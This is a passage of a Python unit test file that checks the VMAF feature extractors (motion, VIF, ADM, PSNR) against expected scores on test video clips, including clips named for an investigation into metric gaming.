s = results[0]['integer_motion_feature_motion_score']
def test_run_integer_motion_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_motion_feature_motion2_score'], 3.895345229166667, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion2_score'], 3.895345229166667, places=8)
self.assertAlmostEqual(results[0]['integer_motion_feature_motion_score'], 4.0498181041666665, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion_score'], 4.0498181041666665, places=8)
def test_run_integer_motion_fextractor_forcing_zero(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'motion_force_zero': True, 'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_motion_feature_motion2_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion2_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[0]['integer_motion_feature_motion_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion_force_0_score'], 0.0, places=8)
def test_run_integer_motion_fextractor_12bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_12bit_videos_for_testing()
self.fextractor = IntegerMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_motion_feature_motion2_score'], 2.8104533333333332, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion2_score'], 2.8104533333333332, places=8)
def test_run_float_vif_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_score'], 0.3634208125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_score'], 0.7666474166666667, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_score'], 0.8628533333333334, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_score'], 0.9159719583333334, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale0_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale1_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['float_VIF_feature_vif_num_score']
def test_run_float_vif_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_score'], 0.3634208125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_score'], 0.7666474166666667, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_score'], 0.8628533333333334, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_score'], 0.9159719583333334, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale0_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale1_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_score'], 0.44609339583333335, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_score'], 712650.1518554376, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_score'], 1597314.4783325624, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_scale0_score'], 468101.7565104167, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_scale0_score'], 1287822.3411458333, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_scale1_score'], 184971.52506510416, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_scale1_score'], 241255.05696614584, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_scale2_score'], 47588.75968416667, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_scale2_score'], 55149.814208979165, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_scale3_score'], 11988.110595750002, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_scale3_score'], 13087.266011562499, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_score'], 0.3636620625, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_score'], 0.7674953125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_score'], 0.8631078125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_score'], 0.9157200833333333, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale0_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale1_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['integer_VIF_feature_vif_num_score']
def test_run_integer_vif_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_score'], 0.3636620625, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_score'], 0.7674953125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_score'], 0.8631078125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_score'], 0.9157200833333333, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale0_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale1_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_score'], 0.44642331250000006, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_score'], 713111.410502125, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_score'], 1597165.5464884583, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_scale0_score'], 468372.4192708333, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_scale0_score'], 1287711.328125, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_scale1_score'], 185125.40266927084, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_scale1_score'], 241188.595703125, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_scale2_score'], 47606.0171713125, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_scale2_score'], 55153.50821933334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_scale3_score'], 12007.571390770832, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_scale3_score'], 13112.1144409375, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor_12bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_12bit_videos_for_testing()
self.fextractor = IntegerVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_score'], 0.4330893333333334, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_score'], 0.830613, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_score'], 0.9072123333333333, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_score'], 0.945896, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale0_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale1_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor_debug1_yuv422p10le(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_10bit_videos_for_testing()
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=True,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_scores'][-1], 0.416638, places=6)
def test_run_integer_vif_fextractor_debug2_160x90(self):
ref_path = VmafConfig.test_resource_path("yuv", "ref_test_0_1_src01_hrc00_576x324_576x324_vs_src01_hrc01_576x324_576x324_q_160x90.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "dis_test_0_1_src01_hrc00_576x324_576x324_vs_src01_hrc01_576x324_576x324_q_160x90.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 160, 'height': 90})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=True,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_scores'][31], 0.982747, places=6)
def test_run_integer_vif_fextractor_debug3_yuv420p10le(self):
ref_path = VmafConfig.test_resource_path("yuv", "sparks_ref_480x270.yuv42010le.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "sparks_dis_480x270.yuv42010le.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 480, 'height': 270,
'yuv_type': 'yuv420p10le'})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=True,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_scores'][0], 0.933186, places=6)
self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_scores'][2], 0.999348, places=6)
def test_run_float_adm_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_score'], 0.9345148541666667, places=4)
self.assertAlmostEqual(results[1]['float_ADM_feature_adm2_score'], 1.0, places=6)
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale0_score'], 0.9078873333333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale1_score'], 0.8938705625000001, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale2_score'], 0.9300123749999999, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale3_score'], 0.9649663541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['float_ADM_feature_adm_num_score']
def test_run_float_adm_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_score'], 0.9345148541666667, places=4)
self.assertAlmostEqual(results[1]['float_ADM_feature_adm2_score'], 1.0, places=6)
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale0_score'], 0.9078873333333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale1_score'], 0.8938705625000001, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale2_score'], 0.9300123749999999, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale3_score'], 0.9649663541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_score'], 0.9345148541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_score'], 371.80645372916666, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_score'], 397.83379106250004, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_scale0_score'], 45.526146958333335, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_scale0_score'], 50.14385129166667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_scale1_score'], 66.574236, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_scale1_score'], 74.47438383333333, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_scale2_score'], 105.55483329166668, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_scale2_score'], 113.49725864583333, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_scale3_score'], 154.15123754166666, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_scale3_score'], 159.7182974375, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_psnr_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerPsnrFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_y_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cb_score'], 38.4494410625, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cr_score'], 40.99191027083334, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_y_score'], 60.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cb_score'], 60.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cr_score'], 60.0, places=4)
def test_run_integer_psnr_fextractor_12bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_12bit_videos_for_testing()
self.fextractor = IntegerPsnrFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_y_score'], 32.577818, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cb_score'], 39.044961, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cr_score'], 41.286965333333335, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_y_score'], 84.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cb_score'], 84.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cr_score'], 84.0, places=4)
def test_run_integer_psnr_fextractor_16bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_16bit_videos_for_testing()
self.fextractor = IntegerPsnrFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_y_score'], 32.579806000000005, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cb_score'], 39.04694966666667, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cr_score'], 41.288954, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_y_score'], 108.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cb_score'], 108.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cr_score'], 108.0, places=4)
def test_run_float_adm_fextractor_akiyo_multiply(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_score'], 1.116686, places=6)
def test_run_float_adm_fextractor_akiyo_multiply_enhn_gain_limit_1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'adm_enhn_gain_limit': 1.0}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_egl_1_score'], 0.9574308606115118, places=6) #
def test_run_float_adm_fextractor_akiyo_multiply_enhn_gain_limit_1d2(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'adm_enhn_gain_limit': 1.2}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_egl_1.2_score'], 1.116595, places=6)
def test_run_float_vif_fextractor_akiyo_multiply(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_score'], 1.0522544319369052, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_score'], 1.0705609423182443, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_score'], 1.0731529493098957, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_score'], 1.0728060231246508, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_float_vif_fextractor_akiyo_multiply_enhn_gain_limit_1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'vif_enhn_gain_limit': 1.0},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_egl_1_score'], 0.983699512450884, places=4)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_egl_1_score'], 0.9974276726830457, places=4)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_egl_1_score'], 0.9984692380091739, places=4)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_egl_1_score'], 0.999146211879154, places=4)
def test_run_float_vif_fextractor_akiyo_multiply_enhn_gain_limit_1d1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'vif_enhn_gain_limit': 1.1},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_egl_1.1_score'], 1.0298451531242514, places=3)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_egl_1.1_score'], 1.046596975760772, places=3)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_egl_1.1_score'], 1.0485607628500504, places=3)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_egl_1.1_score'], 1.0491232394147363, places=3)
def test_run_integer_vif_fextractor_akiyo_multiply(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_score'], 1.052403, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_score'], 1.070149, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_score'], 1.072518, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_score'], 1.072512, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor_akiyo_multiply_enhn_gain_limit_1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
